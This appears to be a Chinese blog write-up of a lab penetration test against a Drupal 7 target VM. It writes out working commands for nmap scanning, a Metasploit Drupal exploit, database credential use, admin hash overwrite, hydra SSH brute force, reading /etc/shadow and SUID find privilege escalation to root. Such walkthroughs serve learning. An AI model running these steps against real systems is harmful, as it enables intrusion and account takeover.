文章描述了一次针对192.168.26.161目标机的渗透测试过程,包括信息收集、端口扫描、发现CMS类型(Drupal7)、尝试SQL注入、利用CMS漏洞获取权限、修改密码、SSH登录以及SUID提权至root权限的过程。
目标机:192.168.26.161
攻击机:192.168.26.144
1、信息收集:
使用ARP扫描,获得信息:
arp-scan -l
适应NMAP进行扫描IP为192.168.26.161 ,看他开启了哪些端口、服务和操作系统:
nmap -A -T4 -p- 192.168.26.161-A:全面扫描/综合扫描
-T4:指定扫描过程的级别,级别越高扫描速度越快,但也容易被防火墙/ids拦截,一般推荐使用T4
-p- :端口扫描
可以看到端口有 80 22 111端口,也就是说有开启了http服务和ssh服务;
打开HTTP服务:(是一个登录框,可能会存在sql注入、弱口令、xss等漏洞)
使用Wappalyzer插件,可以发现CMS是Drupal 7;查看有没有cms漏洞。
对该登录框进行sql注入时,被服务器检测到,然后我的IP被封了,当然了可以使用代理池,进行sql注入,这里我觉得麻烦,刚好也找了该cms Drupal 7的漏洞;
目标明确后,那就进行漏洞利用吧:
使用MSF搜搜该cms的漏洞:
使用这个7.x的版块:
show options
set rhosts 192.168.26.161
exploit
攻击成功后,查看下我们的权限和文件:
这里给出了提示是:查看CMS的配置文件:
那就开始疯狂查看文件信息:
我靠,查到了数据库的帐号密码,那不就很简单了,直接登录MySQL数据库,拿到web服务的帐号密码;
mysql -udbuser -pR0ck3t
use drupaldb;
show tables;
select * from users;
密码是被加密的,要不解密,要不就是更换admin的密码;但是解密的话可能有点负责:
查看下文件,密码是怎么加密的:在users表中,我们发现有admin用户,但是密码是加盐过的,一般加盐的密码是很难破解的,所以选择修改用户密码来解决。首先生成自定密码的加盐哈希值。退出mysql,回到/var/www下执行以下代码,生成自己的加盐密码,
exit //退出mysql的shell
cd /var/www //回到网站目录
php scripts/password-hash.sh 自己设置的密码
php scripts/password-hash.sh 123456php scripts/password-hash.sh 123456
接下来就是将我们的admin密码更换成我我们设置的密码,进行修改;
update users set pass="$S$Dw.yTXAj/HyGhrpbxElnEvrrAvTiRMlbR6c.pUQyZZco7XYVHbZT" where uid=1;
拿着我们的帐号密码进行登录:
点击左上角的,查看flag4
flag3给我们的提示是:去查看存放用户信息的文件和存放密码信息的文件, /etc/shadow无法查看,权限不够,查看etc/passwd,发现目标靶机用户flag4,并且有/bin/bash,看到这想到了还有端口22,所以ssh连接。
帐号密码都在这个文件方的,但是一般低权限的是无法访问的;
cat /etc/shadow
那我们就查查有什么用户或者明文密码:
cat /etc/passwd
flag4用户是可以登录的;那我们就对这个flag4用户进行爆破:
字典文件:
cat /usr/share/john/password.lst hydra -l flag4 -P /usr/share/john/password.lst 192.168.26.161 ssh -vV -f
爆破出用户flag4的密码为:orange
登录成功:
在flag4用户下,我们发现了flag4.txt。根据提示,我们需要拿到root用户的权限,才能得到最终的flag。在这里我们使用suid提权,通过命令查看是否具有root权限的命令。
find / -perm -4000 2>/dev/null 
发现find命令可以进行提权,拥有suid的权限,一般这种的还有(mv、vim、cp……命令)看目标机的情况;
find -exec /bin/sh \;
966
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
